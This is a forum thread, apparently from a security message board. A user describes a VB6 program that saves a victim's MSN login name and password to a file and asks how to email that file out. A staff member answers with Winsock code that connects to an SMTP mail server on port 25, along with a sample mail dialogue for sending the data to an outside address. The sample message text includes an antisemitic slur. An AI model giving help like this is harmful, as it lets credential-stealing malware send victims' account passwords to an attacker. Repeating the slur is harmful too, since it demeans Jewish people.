Hi, I made a little program in VB 6.0 that stores your msn loginname + password in a txt file on the harddisk. (something like msncookie 1.0) Everything works fine, but is it possible to send the txt. file with the password and the loginname from the victim's computer to an e-mailadres. Can I get some help? plz mail me at matn27@hotmail.com. thx (ps mag ook in NL)
Sponsor Advertisements help keep UGN Security Online.
Sponsor Advertisements help keep UGN Security Online.
#17510 - 06/03/0307:57 PMRe: NEED HELP! VB-->mail to..
ninjaneo
UGN Security Staff
Registered: 03/06/02
Posts: 256
Loc: CA, USA
Well, This may be difficult to understand if you have never used the WinSock control but here is a basic idea.
winsock1.connect "mail.attbi.com", "25"
You will need to wait untill winsock1.state = 7 to send data you need to say winsock1.senddata "your text"
I will give a general 'dialouge' between server and your winsock control (client)
Client: HELO localhost Server: +ok HELLO bob-12-14-34-14.attbi.com Client: MAIL FROM: MyProg@attbi.com Server: +ok SENDER OK Client: RCPT TO: 4c3@hotmail.com SERVER: +ok Client: DATA Client: Hey the password is jew! Client: Client: . Server closes connection.
Note: you need to have vbCrLf at the end of each line you send... If you need more help I will try and provide if not--sr should be by eventually